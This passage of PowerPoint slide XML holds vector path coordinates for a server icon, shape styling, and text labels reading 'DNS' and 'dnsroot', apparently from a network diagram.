                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9281" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E1147E9-4BA4-7673-A2FC-D33A12CB7A23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9282" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBEF0A1B-2162-9E0F-B45A-AB9175593652}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9283" name="Gruppo 9282">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D53888D-610B-D0FC-A6C6-63AF074D1F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6310508" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9284" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D1A311-C174-29C9-70D7-F59D6C38787F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9285" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90780D16-E0F8-D100-C9EE-CF1634BE26BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
